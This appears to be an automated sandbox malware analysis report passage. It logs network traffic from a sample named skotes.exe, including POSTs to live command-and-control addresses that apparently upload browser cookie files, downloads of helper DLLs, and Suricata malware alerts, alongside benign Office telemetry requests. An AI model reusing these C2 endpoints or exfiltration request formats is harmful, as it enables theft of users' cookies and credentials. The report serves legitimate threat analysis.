2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 2d 2d 0d 0a Data Ascii: ------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="token"305862276bc2191afe4f6bde9266f1adc12494f77f54b7a7b09c68fae5469ce8eed82f89------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------IDBKKKKKFBGDGDHIDBGH--
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDGHIIECGHDHJKFCAEGHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJKKKFCFHCFIECBGDHIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 35 38 36 32 32 37 36 62 63 32 31 39 31 61 66 65 34 66 36 62 64 65 39 32 36 36 66 31 61 64 63 31 32 34 39 34 66 37 37 66 35 34 62 37 61 37 62 30 39 63 36 38 66 61 65 35 34 36 39 63 65 38 65 65 64 38 32 66 38 39 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 2d 2d 0d 0a Data Ascii: ------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="token"305862276bc2191afe4f6bde9266f1adc12494f77f54b7a7b09c68fae5469ce8eed82f89------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="file"------GIJKKKFCFHCFIECBGDHI--
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHCGDGIEBKJKFHJJKFCHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 43 47 44 47 49 45 42 4b 4a 4b 46 48 4a 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 35 38 36 32 32 37 36 62 63 32 31 39 31 61 66 65 34 66 36 62 64 65 39 32 36 36 66 31 61 64 63 31 32 34 39 34 66 37 37 66 35 34 62 37 61 37 62 30 39 63 36 38 66 61 65 35 34 36 39 63 65 38 65 65 64 38 32 66 38 39 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 43 47 44 47 49 45 42 4b 4a 4b 46 48 4a 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 43 47 44 47 49 45 42 4b 4a 4b 46 48 4a 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 43 47 44 47 49 45 42 4b 4a 4b 46 48 4a 4a 4b 46 43 2d 2d 0d 0a Data Ascii: ------GDHCGDGIEBKJKFHJJKFCContent-Disposition: form-data; name="token"305862276bc2191afe4f6bde9266f1adc12494f77f54b7a7b09c68fae5469ce8eed82f89------GDHCGDGIEBKJKFHJJKFCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDHCGDGIEBKJKFHJJKFCContent-Disposition: form-data; name="file"------GDHCGDGIEBKJKFHJJKFC--
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: GET /746f34465cf17784/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: GET /746f34465cf17784/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: GET /746f34465cf17784/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                          Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                          Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Joe Sandbox ViewJA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:63794 -> 208.109.77.116:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:63819 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63854 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63867 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:63862 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63873 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63884 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63896 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:63898 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63909 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63923 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:63908 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:63937 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63970 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:63979 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:64038 -> 185.215.113.206:80
                          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_004BBE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,6_2_004BBE30
                          Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
